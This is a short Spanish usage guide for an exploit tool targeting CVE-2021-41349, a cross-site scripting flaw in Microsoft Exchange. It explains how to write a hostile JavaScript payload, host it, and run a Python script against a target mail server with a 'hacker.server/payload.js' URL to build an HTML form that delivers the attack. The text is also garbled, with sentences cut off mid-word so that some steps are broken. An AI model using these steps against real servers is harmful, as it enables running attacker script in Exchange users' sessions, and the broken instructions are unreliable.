
Herramienta de explotación para CVE-2021-41349 que genera un formulario HTML para entregar payloads XSS a servidores Microsoft Exchange, permitiendo la ejecución de JavaScript arbitrario.
Explotando: CVE-2021-41349
Esta herramienta de explotación crea un Formulario para publicar un Payload XSS en el servidor Exchange objetivo.
Debes crear un js que contenga lo que deseas hacer.
js y súbelo a algún lugar.CVE-2021-41349.py siguiendo los siguientes pasos.python3 CVE-2021-41349.py "https://mail.target.com" "https://hacker.server/payload.js" out.html
o:
./CVE-2021-41349.py "https://mail.target.com" "https://hacker.server/payload.js" out.html
html al servidor.